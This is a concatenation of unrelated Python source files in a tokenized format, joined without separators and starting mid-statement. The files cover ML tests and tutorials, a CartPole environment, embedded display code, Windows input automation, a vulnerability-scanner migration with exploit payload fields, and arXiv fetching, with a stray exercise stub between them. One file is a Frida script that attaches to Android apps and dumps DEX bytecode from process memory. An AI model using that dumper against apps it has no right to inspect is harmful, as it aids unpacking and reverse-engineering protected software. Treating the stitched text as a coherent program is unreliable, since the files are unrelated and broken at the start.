response2.signature)<line_sep>self.assertEqual(response.attestation response2.attestation)<line_sep>self.assertEqual(response.output response2.output)<line_sep>response3=RunModelResponse()<line_sep>response3.load_from_bytes(response.as_bytes())<line_sep>self.assertEqual(response.payload response3.payload)<line_sep>self.assertEqual(response.signature response3.signature)<line_sep>self.assertEqual(response.attestation response3.attestation)<line_sep>self.assertEqual(response.output response3.output)<line_sep>response3.save_to_file(tmp_path)<line_sep>response4=RunModelResponse()<line_sep>response4.load_from_file(tmp_path)<line_sep>self.assertEqual(response.payload response4.payload)<line_sep>self.assertEqual(response.signature response4.signature)<line_sep>self.assertEqual(response.attestation response4.attestation)<line_sep>self.assertEqual(response.output response4.output)<block_end><def_stmt>test_parse_upload self<block_start>response=UploadModelResponse()<line_sep>response.load_from_file(exec_upload)<line_sep>self.assertTrue(response.is_signed())<line_sep>response2=UploadModelResponse()<with_stmt>open(exec_upload "rb")<as>file<block_start>response2.load_from_bytes(file.read())<block_end>self.assertEqual(response.payload response2.payload)<line_sep>self.assertEqual(response.signature response2.signature)<line_sep>self.assertEqual(response.attestation response2.attestation)<line_sep>response3=UploadModelResponse()<line_sep>response3.load_from_bytes(response.as_bytes())<line_sep>self.assertEqual(response.payload response3.payload)<line_sep>self.assertEqual(response.signature response3.signature)<line_sep>self.assertEqual(response.attestation response3.attestation)<line_sep>response3.save_to_file(tmp_path)<line_sep>response4=UploadModelResponse()<line_sep>response4.load_from_file(tmp_path)<line_sep>self.assertEqual(response.payload response4.payload)<line_sep>self.assertEqual(response.signature response4.signature)<line_sep>self.assertEqual(response.attestation response4.attestation)<block_end><def_stmt>test_validate_run self<block_start>response=RunModelResponse()<line_sep>response.load_from_file(exec_run)<line_sep>policy=Policy.from_file(policy_file)<line_sep>response.validate(get_input() policy=policy )<line_sep># Not signed response2=deepcopy(response)<line_sep>response2.signature=<none><line_sep>response2.attestation=<none><with_stmt>self.assertRaises(SignatureError)<block_start>response2.validate(get_input() policy=policy )<block_end># Quote validation response2=deepcopy(response)<line_sep>response2.attestation.quote<augadd>b"a"<with_stmt>self.assertRaises(AttestationError)<block_start>response2.validate(get_input() policy=policy )<block_end>response2=deepcopy(response)<line_sep>response2.attestation.enclave_held_data<augadd>b"a"<with_stmt>self.assertRaises(AttestationError)<block_start>response2.validate(get_input() policy=policy )<block_end># Payload validation response2=deepcopy(response)<line_sep>payload=Payload.FromString(response2.payload)<line_sep>payload.run_model_payload.output[0]<augadd>0.1<line_sep>response2.payload=payload.SerializeToString()<with_stmt>self.assertRaises(SignatureError)<block_start>response2.validate(get_input() policy=policy )<block_end># Input validation response2=deepcopy(response)<line_sep>data=deepcopy(get_input())<line_sep>data[4]<augadd>1<with_stmt>self.assertRaises(SignatureError)<block_start>response2.validate(data policy=policy )<block_end># Using file response.validate(get_input() policy_file=policy_file )<block_end><def_stmt>test_validate_upload self<block_start>response=UploadModelResponse()<line_sep>response.load_from_file(exec_upload)<line_sep>policy=Policy.from_file(policy_file)<line_sep>model_hash=sha256(get_model()).digest()<line_sep>response.validate(model_hash policy=policy )<line_sep># Not signed response2=deepcopy(response)<line_sep>response2.signature=<none><line_sep>response2.attestation=<none><with_stmt>self.assertRaises(SignatureError)<block_start>response2.validate(model_hash policy=policy )<block_end># Quote validation response2=deepcopy(response)<line_sep>response2.attestation.quote<augadd>b"a"<with_stmt>self.assertRaises(AttestationError)<block_start>response2.validate(model_hash policy=policy )<block_end>response2=deepcopy(response)<line_sep>response2.attestation.enclave_held_data<augadd>b"a"<with_stmt>self.assertRaises(AttestationError)<block_start>response2.validate(model_hash policy=policy )<block_end># Payload validation response2=deepcopy(response)<line_sep>payload=Payload.FromString(response2.payload)<line_sep>payload.send_model_payload.model_hash=(b"1"+payload.send_model_payload.model_hash[1:])<line_sep>response2.payload=payload.SerializeToString()<with_stmt>self.assertRaises(SignatureError)<block_start>response2.validate(model_hash policy=policy )<block_end># Input validation response2=deepcopy(response)<line_sep>new_hash=model_hash[:5]+b"1"+model_hash[6:]<with_stmt>self.assertRaises(SignatureError)<block_start>response2.validate(new_hash policy=policy )<block_end># Using file response.validate(model_hash policy_file=policy_file )<block_end><block_end>
##$$## ---------- TAGS ----------- ##$$## ##$$## first,non,repeated,character ##$$## --------- ENDTAGS --------- ##$$## ###### - Write your answer below - ######
""" ====================================================== From ResNets to Momentum ResNets 1) ====================================================== This is a tutorial to use the transform_to_momentumnet method: <NAME>, <NAME>, <NAME>, <NAME>. Momentum Residual Neural Networks. Proceedings of the 38th International Conference on Machine Learning, PMLR 139:9276-9287 """<line_sep># noqa # Authors: <NAME>, <NAME> # License: MIT <import_from_stmt>torch nn<import_from_stmt>momentumnet transform_to_momentumnet<line_sep>#################################### # Let us define a toy Neural Network #################################### <class_stmt>ResBlock(nn.Module)<block_start><def_stmt>__init__ self functions<block_start>super(ResBlock self).__init__()<line_sep>self.functions=functions<block_end><def_stmt>forward self x<block_start><for_stmt>f self.functions<block_start>x=x+f(x)<block_end><return>x<block_end><block_end><class_stmt>Net(nn.Module)<block_start><def_stmt>__init__ self<block_start>super(Net self).__init__()<line_sep>self.res_layer1=ResBlock(nn.Sequential(*[nn.Sequential(nn.Linear(2 10) nn.Tanh() nn.Linear(10 2))<for>_ range(3)]))<line_sep>self.l1=nn.Linear(2 4)<line_sep>self.layer2=nn.Sequential(*[nn.Sequential(nn.Linear(4 100) nn.ReLU() nn.Linear(100 4))<for>_ range(4)])<line_sep>self.l2=nn.Linear(4 8)<line_sep>self.fc=nn.Linear(8 10)<block_end><def_stmt>forward self x<block_start>out=self.res_layer1(x)# Residual out=self.l1(out)<line_sep>out=self.layer2(out)# Not Residual but same dimensions out=self.l2(out)<line_sep>out=self.fc(out)<line_sep><return>out<block_end><block_end>net=Net()<line_sep>################################################### # We want to transform it into its Momentum version ################################################### ############################################################################### # The first layer 'res_layer1' preserves dimension and is residual. # It can be accessed through net.res_layer_1.functions so we will specify # this attribute as the "sub_layers" parameter. # One can transform this residual block into a momentum one as follow: mnet1=transform_to_momentumnet(net ["res_layer1.functions"] # attributes of the sublayers in net gamma=0.9 use_backprop=<false> is_residual=<true> keep_first_layer=<false> )<line_sep>############################################################################### # Note that layer2 is not residual but also preserves dimensions. # It can be accessed through net.layer_2 so we will specify # this attribute as the "sub_layers" parameter. # One can transform it in the same way setting is_residual to False. mnet=transform_to_momentumnet(mnet1 ["layer2"] gamma=0.9 use_backprop=<false> is_residual=<false> keep_first_layer=<false> )<line_sep>############################################################################### # net, mnet1, and mnet have the same parameters.
""" Largely based on the OpenAI Gym Implementation https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py """<import_from_future_stmt> division generators print_function<import_stmt>numpy<as>np<import_stmt>macarico<import_stmt>math<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<import_from_stmt>torch.autograd Variable<as>Var<class_stmt>CartPoleEnv(macarico.Env)<block_start><def_stmt>__init__ self<block_start>macarico.Env.__init__(self 2 200)<line_sep>self.gravity=9.8<line_sep>self.masscart=1.0<line_sep>self.masspole=0.1<line_sep>self.total_mass=(self.masspole+self.masscart)<line_sep>self.length=0.5# actually half the pole's length self.polemass_length=(self.masspole<times>self.length)<line_sep>self.force_mag=10.0<line_sep>self.tau=0.02# seconds between state updates # Angle at which to fail the episode self.theta_threshold_radians=12<times>2<times>math.pi/360<line_sep>self.x_threshold=2.4<line_sep># Angle limit set to 2 * theta_threshold_radians so failing observation # is still within bounds self.state=<none><line_sep># For macarico.Env self.actions=set(range(self.n_actions))<block_end><def_stmt>_rewind self<block_start>self.state=torch.rand(4)<times>0.1-0.05<line_sep>self.steps_beyond_done=<none><block_end><def_stmt>_run_episode self policy<block_start><for_stmt>_ range(self.horizon())<block_start>a=policy(self)<if_stmt>self.step(a)<block_start><break><block_end><block_end><return>self._trajectory<block_end><def_stmt>step self action<block_start>state=self.state<line_sep>x,x_dot,theta,theta_dot=state<line_sep>force=self.force_mag<if>action<eq>1<else>-self.force_mag<line_sep>costheta=math.cos(theta)<line_sep>sintheta=math.sin(theta)<line_sep>temp=(force+self.polemass_length<times>theta_dot<times>theta_dot<times>sintheta)/self.total_mass<line_sep>thetaacc=(self.gravity<times>sintheta-costheta<times>temp)/(self.length<times>(4.0/3.0-self.masspole<times>costheta<times>costheta/self.total_mass))<line_sep>xacc=temp-self.polemass_length<times>thetaacc<times>costheta/self.total_mass<line_sep>x=x+self.tau<times>x_dot<line_sep>x_dot=x_dot+self.tau<times>xacc<line_sep>theta=theta+self.tau<times>theta_dot<line_sep>theta_dot=theta_dot+self.tau<times>thetaacc<line_sep>#self.state = (x, x_dot, theta, theta_dot) self.state[0]=x<line_sep>self.state[1]=x_dot<line_sep>self.state[2]=theta<line_sep>self.state[3]=theta_dot<line_sep>done=x<l>-self.x_threshold<or>x<g>self.x_threshold<or>theta<l>-self.theta_threshold_radians<or>theta<g>self.theta_threshold_radians<line_sep><return>done<block_end><block_end><class_stmt>CartPoleLoss(macarico.Loss)<block_start><def_stmt>__init__ self<block_start>super(CartPoleLoss self).__init__('-t')<block_end><def_stmt>evaluate self example<block_start><return>-len(example.Yhat)<line_sep>#return (100 - state.t) / 100 <block_end><block_end><class_stmt>CartPoleFeatures(macarico.DynamicFeatures)<block_start><def_stmt>__init__ self<block_start>macarico.DynamicFeatures.__init__(self 4)<block_end><def_stmt>_forward self state<block_start><return>Var(state.state.view(1 1 -1) requires_grad=<false>)<block_end><block_end>
<import_stmt>pytest<import_stmt>numpy<as>np<line_sep>torch=pytest.importorskip('torch')<import_from_stmt>baseline.utils Offsets<import_from_stmt>baseline.pytorch.torchy SequenceCriterion<line_sep>C=10<line_sep>B=50<line_sep>S=20<line_sep>@pytest.fixture<def_stmt>lengths <block_start>lengths=torch.randint(1 S size=(B )).long()<line_sep><return>lengths<block_end>@pytest.fixture<def_stmt>logits lengths<block_start>logits=torch.rand(B S C)<for_stmt>i,l enumerate(lengths)<block_start>logits[i l: :]=0<block_end><return>logits<block_end>@pytest.fixture<def_stmt>labels lengths<block_start>lab=torch.randint(1 C size=(B S)).long()<for_stmt>i,l enumerate(lengths)<block_start>lab[i l:]=0<block_end><return>lab<block_end><def_stmt>raw_loss logits labels loss<block_start>B,T,H=logits.size()<line_sep>crit=loss(reduce=<false> ignore_index=Offsets.PAD)<line_sep>total_size=labels.nelement()<line_sep>res=crit(logits.view(total_size -1) labels.view(total_size))<line_sep><return>res.view(B T)<block_end><def_stmt>test_batch_sequence_loss logits labels<block_start>loss=torch.nn.CrossEntropyLoss<line_sep>raw=raw_loss(logits labels loss)<line_sep>gold=torch.mean(torch.sum(raw dim=1))<line_sep>crit=SequenceCriterion(LossFn=loss avg='batch')<line_sep>res=crit(logits labels)<line_sep>np.testing.assert_allclose(res.numpy() gold.numpy() rtol=1e-6)<block_end><def_stmt>test_token_sequence_loss logits labels lengths<block_start>loss=torch.nn.CrossEntropyLoss<line_sep>raw=raw_loss(logits labels loss)<line_sep>gold=torch.sum(raw)/torch.sum(lengths).to(logits.dtype)<line_sep>crit=SequenceCriterion(LossFn=loss avg='token')<line_sep>res=crit(logits labels)<line_sep>np.testing.assert_allclose(res.numpy() gold.numpy() rtol=1e-6)<block_end>
<import_stmt>lvgl<as>lv<import_stmt>lvgl_helper<as>lv_h<import_stmt>lcd<import_stmt>time<import_from_stmt>machine Timer<import_from_stmt>machine I2C<import_stmt>touchscreen<as>ts<line_sep>i2c=I2C(I2C.I2C0 freq=400000 scl=30 sda=31)<line_sep>lcd.init()<line_sep>ts.init(i2c)<line_sep>lv.init()<line_sep>disp_buf1=lv.disp_buf_t()<line_sep>buf1_1=bytearray(320<times>10)<line_sep>lv.disp_buf_init(disp_buf1 buf1_1 <none> len(buf1_1)<floordiv>4)<line_sep>disp_drv=lv.disp_drv_t()<line_sep>lv.disp_drv_init(disp_drv)<line_sep>disp_drv.buffer=disp_buf1<line_sep>disp_drv.flush_cb=lv_h.flush<line_sep>disp_drv.hor_res=320<line_sep>disp_drv.ver_res=240<line_sep>lv.disp_drv_register(disp_drv)<line_sep>indev_drv=lv.indev_drv_t()<line_sep>lv.indev_drv_init(indev_drv)<line_sep>indev_drv.type=lv.INDEV_TYPE.POINTER<line_sep>indev_drv.read_cb=lv_h.read<line_sep>lv.indev_drv_register(indev_drv)<line_sep># lv.log_register_print_cb(lv_h.log) lv.log_register_print_cb(<lambda>level path line msg:print('%s(%d): %s'%(path line msg)))<line_sep># Image data <with_stmt>open('/flash/blue_flower_32.bin' 'rb')<as>f<block_start>img_data=f.read()<block_end># Pixel format: Fix 0xFF: 8 bit, Red: 8 bit, Green: 8 bit, Blue: 8 bit # Create a screen with a draggable image scr=lv.obj()<line_sep>img=lv.img(scr)<line_sep>img.align(scr lv.ALIGN.CENTER 0 0)<line_sep>img_dsc=lv.img_dsc_t({'header':{'always_zero':0 'w':100 'h':75 'cf':lv.img.CF.TRUE_COLOR} 'data_size':len(img_data) 'data':img_data})<line_sep>img.set_src(img_dsc)<line_sep>img.set_drag(<false>)<line_sep># Load the screen and display image lv.scr_load(scr)<def_stmt>on_timer timer<block_start>lv.tick_inc(5)<block_end>timer=Timer(Timer.TIMER0 Timer.CHANNEL0 mode=Timer.MODE_PERIODIC period=5 unit=Timer.UNIT_MS callback=on_timer arg=<none>)<while_stmt><true><block_start>tim=time.ticks_ms()<line_sep>lv.task_handler()<while_stmt>time.ticks_ms()-tim<l>5<block_start><pass><block_end><block_end>
<import_stmt>json<import_stmt>os<import_stmt>sys<import_stmt>frida<import_stmt>time<import_stmt>re<if_stmt>len(sys.argv)<le>1<block_start>print("[Dumpdex]: you should pass pid/packageName")<line_sep>exit()<block_end>device=frida.get_usb_device()<line_sep>pkg_name=device.get_frontmost_application().identifier<line_sep># check is package or pid pattern=re.compile(r'^\d+$' re.I)<line_sep>m=pattern.match(sys.argv[1])<if_stmt>m<block_start>app_pid=sys.argv[1]<line_sep>print("[Dumpdex]: you specail the pid:"+app_pid)<line_sep># if customize the pid, use this pid. Such as app has mutiple pid <if_stmt>('app_pid'<in>locals()<or>'app_pid'<in>globals())<and>app_pid<block_start>session=device.attach(int(app_pid))<block_end><else_stmt><block_start>session=device.attach(pkg_name)<block_end><block_end><else_stmt><block_start>pkg_name=sys.argv[1]<line_sep>print("[Dumpdex]: you specail the package name:"+pkg_name+", so spawn it and sleep 50s for launch completely")<line_sep>pid=device.spawn(pkg_name)<line_sep>time.sleep(50)<line_sep>session=device.attach(pid)<block_end>script=session.create_script(open(open(os.path.expanduser("~/.xadb/rootdir")).read().strip()+"/script/agent.js").read())<line_sep>script.load()<line_sep>matches=script.exports.scandex()<for_stmt>dex matches<block_start>bs=script.exports.memorydump(dex['addr'] dex['size'])<if_stmt><not>os.path.exists("./"+pkg_name+"/")<block_start>os.mkdir("./"+pkg_name+"/")<block_end>open(pkg_name+"/"+dex['addr']+".dex" 'wb').write(bs)<line_sep>print("[Dumpdex]: DexSize="+hex(dex['size'])+", SavePath=./"+pkg_name+"/"+dex['addr']+".dex")<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>RecoPixelVertexing.PixelLowPtUtilities.StripSubClusterShapeFilter_cfi StripSubClusterShapeFilterParams<line_sep>StripSubClusterShapeSeedFilter=cms.PSet(StripSubClusterShapeFilterParams ComponentName=cms.string('StripSubClusterShapeSeedFilter') FilterAtHelixStage=cms.bool(<false>) label=cms.untracked.string("Seeds") )<line_sep>
<import_stmt>numpy<import_from_stmt>chainer functions<import_from_stmt>chainer testing<line_sep>@testing.parameterize(*(testing.product({'batchsize':[1 5] 'size':[10 20] 'dtype':[numpy.float32] 'eps':[1e-5 1e-1] })))@testing.inject_backend_tests(<none> # CPU tests [{} ]# GPU tests +testing.product({'use_cuda':[<true>] 'use_cudnn':['never' 'always'] 'cuda_device':[0 1] })# ChainerX tests +[{'use_chainerx':<true> 'chainerx_device':'native:0'} {'use_chainerx':<true> 'chainerx_device':'cuda:0'} {'use_chainerx':<true> 'chainerx_device':'cuda:1'} ])<class_stmt>TestLayerNormalization(testing.FunctionTestCase)<block_start><def_stmt>setUp self<block_start>self.check_forward_options={'atol':1e-4 'rtol':1e-3}<line_sep>self.check_backward_options={'atol':1e-3 'rtol':1e-2}<line_sep>self.check_double_backward_options={'atol':1e-3 'rtol':1e-2}<if_stmt>self.dtype<eq>numpy.float16<block_start>self.check_forward_options={'atol':1e-3 'rtol':1e-2}<line_sep>self.check_backward_options={'atol':1e-3 'rtol':1e-2}<line_sep>self.check_double_backward_options={'atol':1e-3 'rtol':1e-2}<block_end><block_end><def_stmt>generate_inputs self<block_start>shape=self.batchsize self.size<line_sep>size=numpy.prod(shape)<floordiv>shape[0]<line_sep>x=numpy.random.uniform(-1 1 shape).astype(self.dtype)<line_sep>gamma=numpy.random.uniform(-1 1 size).astype(self.dtype)<line_sep>beta=numpy.random.uniform(-1 1 size).astype(self.dtype)<line_sep><return>x gamma beta<block_end><def_stmt>forward_expected self inputs<block_start>x,gamma,beta=inputs<line_sep>mean=numpy.mean(x axis=1 keepdims=<true>)<line_sep>var=numpy.mean(numpy.square(x-mean) axis=1 keepdims=<true>)<line_sep>std=numpy.sqrt(var+self.eps)<line_sep>y_expected=(numpy.expand_dims(gamma axis=0)<times>(x-mean)/std+numpy.expand_dims(beta axis=0))<line_sep><return>y_expected <block_end><def_stmt>forward self inputs device<block_start>x,gamma,beta=inputs<line_sep>y=functions.layer_normalization(x gamma beta eps=self.eps)<line_sep><return>y <block_end><block_end>testing.run_module(__name__ __file__)<line_sep>
# Copyright 2022 NVIDIA Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # <import_stmt>random<import_stmt>numpy<as>np<import_stmt>pytest<import_stmt>cunumeric<as>cn<import_from_stmt>legate.core LEGATE_MAX_DIM<line_sep>@pytest.mark.parametrize("ndim" range(0 LEGATE_MAX_DIM))<def_stmt>test_indices ndim<block_start>dimensions=tuple(random.randint(2 5)<for>i range(ndim))<line_sep>np_res=np.indices(dimensions)<line_sep>cn_res=cn.indices(dimensions)<assert_stmt>np.array_equal(np_res cn_res)<line_sep>np_res=np.indices(dimensions dtype=float)<line_sep>cn_res=cn.indices(dimensions dtype=float)<assert_stmt>np.array_equal(np_res cn_res)<line_sep>np_res=np.indices(dimensions sparse=<true>)<line_sep>cn_res=cn.indices(dimensions sparse=<true>)<for_stmt>i range(len(np_res))<block_start><assert_stmt>np.array_equal(np_res[i] cn_res[i])<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start><import_stmt>sys<line_sep>sys.exit(pytest.main(sys.argv))<block_end>
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making GameAISDK available. This source code file is licensed under the GNU General Public License Version 3. For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package. Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved. """<import_stmt>time<import_stmt>traceback<import_stmt>logging<import_stmt>win32gui<import_from_stmt>..iPcDeviceAPI IPcDeviceAPI<import_from_stmt>.APIDefine LOG_DEFAULT<import_from_stmt>.win32driver.capture get_image roi<import_from_stmt>.win32driver.keyboard Keyboard<import_from_stmt>.win32driver.mouse Mouse MouseClickType MouseFlag<import_from_stmt>.win32driver.probe Win32Probe set_foreground_window<import_from_stmt>.win32driver.by QPath<class_stmt>WindowsDeviceAPI(IPcDeviceAPI)<block_start><def_stmt>__init__ self platform<block_start>IPcDeviceAPI.__init__(self platform)<line_sep>self.__logger=logging.getLogger(LOG_DEFAULT)<line_sep>self._is_desktop_window=<false><line_sep>self._hwnd=<none><line_sep>self._qpath=<none><line_sep>self._windows_size=<none><line_sep>self._kwargs={}<block_end><def_stmt>Initialize self **kwargs<block_start>hwnd=kwargs.get('hwnd' <none>)<line_sep>query_path=kwargs.get('query_path' <none>)<line_sep>window_size=kwargs.get('window_size' <none>)<if_stmt><not>hwnd<and>query_path<is><none><block_start>hwnd=win32gui.GetDesktopWindow()<line_sep>self._is_desktop_window=<true><block_end><if_stmt><not>hwnd<and>query_path# hwnd = 0xE019DC <block_start>hwnds=Win32Probe().search_element(QPath(query_path))<line_sep>cnt=len(hwnds)<if_stmt>cnt<g>1<block_start><raise>Exception('found multi windows by qpath(%s)'%query_path)<block_end><elif_stmt>cnt<eq>0<block_start><raise>Exception('failed to find window by qpath(%s)'%query_path)<block_end>hwnd=hwnds[0]<block_end><if_stmt>isinstance(hwnd str)<and>hwnd.isdigit()<block_start>hwnd=int(hwnd)<block_end><if_stmt><not>win32gui.IsWindow(hwnd)<block_start><raise>ValueError('hwnd(%s) is not valid'%hwnd)<block_end><if_stmt>window_size<block_start>l,t,r,b=win32gui.GetWindowRect(hwnd)<line_sep>w=r-l<line_sep>h=b-t<if_stmt>abs(w-window_size[0])<g>50<or>abs(h-window_size[1])<g>50<block_start><raise>Exception('window size is not equal, real(%s) != %s'%(str([w h]) str(window_size)))<block_end><block_end>top_hwnd=Win32Probe().get_property(hwnd 'TOPLEVELWINDOW')<if_stmt>top_hwnd<block_start>set_foreground_window(top_hwnd)<block_end>self._hwnd=hwnd<line_sep>self._qpath=query_path<line_sep>self._kwargs=kwargs<line_sep>self._windows_size=window_size<line_sep><return><true><block_end>@property<def_stmt>window_handle self<block_start><return>self._hwnd<block_end><def_stmt>DeInitialize self<block_start><return><true><block_end><def_stmt>ScreenCap self subrect=<none><block_start>""" :param subrect: :return: """<try_stmt><block_start>img_data=get_image(self._hwnd)<if_stmt>img_data<is><not><none><and>subrect<block_start>img_data=roi(img_data subrect)<block_end><return>img_data<block_end><except_stmt>Exception<as>e<block_start>self.__logger.error('screencap error: %s' e)<line_sep><raise>e<block_end><block_end><def_stmt>_to_screen_pos self client_pos<block_start>""" 将相对于窗口的坐标转成屏幕坐标 :param client_pos: :return: """<if_stmt>self._is_desktop_window<block_start><return>client_pos<block_end>x,y=client_pos<line_sep>rc=win32gui.GetWindowRect(self._hwnd)<line_sep>pt=(x+rc[0] y+rc[1])<line_sep><return>pt<block_end><def_stmt>PressKey self key<block_start>Keyboard.press_key(key)<block_end><def_stmt>ReleaseKey self key<block_start>Keyboard.release_key(key)<block_end><def_stmt>InputKeys self keys long_click_time# self.keyboard.inputKeys(keys) <block_start>Keyboard.input_keys(keys)<if_stmt>long_click_time<g>0<block_start>time.sleep(long_click_time/1000)<block_end><block_end><def_stmt>InputStrings self key_string<block_start>Keyboard.input_keys(key_string)<line_sep># self.keyboard.inputString(key_string) <block_end><def_stmt>MouseMove self px py<block_start>sx,sy=self._to_screen_pos((px py))<line_sep>Mouse.move(sx sy)<line_sep># percent_x, percent_y = self.pixel_to_percent(px, py) # self.mouse.move((percent_x, percent_y)) <block_end><def_stmt>MouseClick self px py by_post=<false><block_start><if_stmt>by_post<block_start>Mouse.post_click(self._hwnd px py)<block_end><else_stmt><block_start>sx,sy=self._to_screen_pos((px py))<line_sep>Mouse.click(sx sy)<block_end># percent_x, percent_y = self.pixel_to_percent(px, py) # self.mouse.click((percent_x, percent_y)) <block_end><def_stmt>MouseDoubleClick self px py<block_start>sx,sy=self._to_screen_pos((px py))<line_sep>Mouse.click(sx sy click_type=MouseClickType.DoubleClick)<line_sep># percent_x, percent_y = self.pixel_to_percent(px, py) # self.mouse.doubleclick((percent_x, percent_y)) <block_end><def_stmt>MouseRightClick self px py<block_start>sx,sy=self._to_screen_pos((px py))<line_sep>Mouse.click(sx sy MouseFlag.RightButton)<line_sep># percent_x, percent_y = self.pixel_to_percent(px, py) # self.mouse.rightclick((percent_x, percent_y)) <block_end><def_stmt>MouseLongClick self px py long_click_time<block_start>""" :param px: :param py: :param long_click_time: 长按时间,以毫秒为单位 :return: """<line_sep>sx,sy=self._to_screen_pos((px py))<line_sep>Mouse.click(sx sy)<line_sep>time.sleep(long_click_time/1000)<line_sep># percent_x, percent_y = self.pixel_to_percent(px, py) # self.mouse.longclick(long_click_time / 1000, (percent_x, percent_y)) <block_end><def_stmt>MouseDrag self from_x from_y to_x to_y<block_start>""" 从起点(from_x, from_y)拖动到(to_x, to_y) :param from_x: :param from_y: :param to_x: :param to_y: :return: """<line_sep>sfx,sfy=self._to_screen_pos((from_x from_y))<line_sep>stx,sty=self._to_screen_pos((to_x to_y))<line_sep>Mouse.drag(sfx sfy stx sty)<block_end><block_end>
""" An app script to run registration between two cameras from the command line. Copyright (C) Microsoft Corporation. All rights reserved. """<line_sep># Standard Libraries. <import_stmt>argparse<line_sep># Calibration tools. <import_from_stmt>camera_tools register<line_sep># ------------------------------------------------------------------------------ <def_stmt>parse_args <block_start>""" Get arguments for running the registration. Returns: args -- Return a list of command line arguments for running registration. """<line_sep>parser=argparse.ArgumentParser(description="Get extrinsics for cameras.")<line_sep>parser.add_argument("-ia" "--img-a" required=<true> help="Full path to image from camera A.")<line_sep>parser.add_argument("-ib" "--img-b" required=<true> help="Full path to image from camera B.")<line_sep>parser.add_argument("-t" "--template" required=<true> help="Full path to Charuco board template file.")<line_sep>parser.add_argument("-ca" "--calib-a" required=<true> help="Full path to calibration file from camera A.")<line_sep>parser.add_argument("-cb" "--calib-b" required=<true> help="Full path to calibration file from camera B.")<line_sep>parser.add_argument("-o" "--out-dir" required=<true> help="Output directory for full calibration blob.")<line_sep>cmd_args=parser.parse_args()<line_sep><return>cmd_args<block_end><if_stmt>__name__<eq>"__main__"<block_start>args=parse_args()<line_sep>rotation,translation,rms1_pixels,rms1_rad,rms2_pixels,rms2_rad=register(args.img_a args.img_b args.template args.calib_a args.calib_b args.out_dir)<block_end>
# Generated by Django 4.0.1 on 2022-03-10 17:36 <import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('Assets' '0003_alter_assetlist_timestamp_alter_assettask_timestamp') ('VulnerableScan' '0003_alter_exploitregister_timestamp_and_more') ]<line_sep>operations=[migrations.RemoveField(model_name='exploitregister' name='file_object' ) migrations.AddField(model_name='exploitregister' name='code' field=models.TextField(db_column='code' null=<true> verbose_name='负载代码') ) migrations.AddField(model_name='exploitregister' name='debug_info' field=models.TextField(blank=<true> db_column='debug_info' default='' null=<true> verbose_name='调试信息') ) migrations.AddField(model_name='exploitregister' name='function_name' field=models.CharField(db_column='function_name' default='' max_length=100 verbose_name='函数名称') ) migrations.AddField(model_name='exploitregister' name='target' field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE to='Assets.assetlist' verbose_name='调试目标') ) migrations.AlterField(model_name='exploitregister' name='description' field=models.TextField(db_column='description' verbose_name='负载描述') ) ]<block_end>
# Copyright 2017 Battelle Energy Alliance, LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>numpy<as>np<def_stmt>run raven inputs<block_start>""" Run method. @ In, raven, object, RAVEN object @ In, inputs, dict, input dictionary @ Out, None """<line_sep># inputs: a, b, c # outputs: d, e, f # indices: d(), e(x), f(x, y) a=raven.a<line_sep>b=raven.b<line_sep>c=raven.c<line_sep>nx=5<line_sep>ny=3<line_sep>x=np.arange(nx)<times>0.1<line_sep>y=np.arange(ny)<times>10<line_sep>d=a<times>a<line_sep>e=x<times>b<line_sep>f=np.arange(nx<times>ny).reshape(nx ny)<times>c<line_sep># save raven.x=x<line_sep>raven.y=y<line_sep>raven.d=d<line_sep>raven.e=e<line_sep>raven.f=f<line_sep>raven._indexMap={'e':['x'] 'f':['x' 'y']}<block_end>
<import_stmt>argparse<import_stmt>os<import_from_stmt>common directories<import_from_stmt>common.fetch_arxiv fetch_from_arxiv<import_from_stmt>common.unpack unpack unpack_archive<if_stmt>__name__<eq>"__main__"<block_start>parser=argparse.ArgumentParser("Fetch and unpack sources for a single arXiv paper.")<line_sep>parser.add_argument("arxiv_id" help="The arXiv ID for a paper. May include version number (i.e., 'v1', 'v2', etc.)" )<line_sep>parser.add_argument("--output-dir" help=("Directory into which the arXiv sources will be fetched. The fetched sources will "+"be saved in a subfolder of the output folder with its name as the arXiv ID "+"(i.e., 'output_dir/<arxiv_id>/').") default="tmp" )<line_sep>args=parser.parse_args()<line_sep>arxiv_id=args.arxiv_id<line_sep>output_dir=args.output_dir<line_sep>archives_dir=os.path.join(output_dir "archives")<line_sep>archive_path=os.path.join(archives_dir directories.escape_slashes(arxiv_id))<line_sep>sources_dir=os.path.join(output_dir directories.escape_slashes(arxiv_id))<if_stmt><not>os.path.exists(archives_dir)<block_start>print(f"Creating directory to hold source archives at {archives_dir}.")<line_sep>os.makedirs(archives_dir)<block_end>print(f"Downloading archive of source files from arXiv for paper {arxiv_id}..." end="" )<line_sep>fetch_from_arxiv(arxiv_id dest=archive_path)<line_sep>print("done.")<if_stmt><not>os.path.exists(sources_dir)<block_start>print(f"Creating directory to hold unpacked sources at {sources_dir}.")<line_sep>os.makedirs(sources_dir)<block_end>print(f"Unpacking sources for paper {arxiv_id} into {sources_dir}.")<line_sep>unpack_archive(archive_path sources_dir)<block_end>
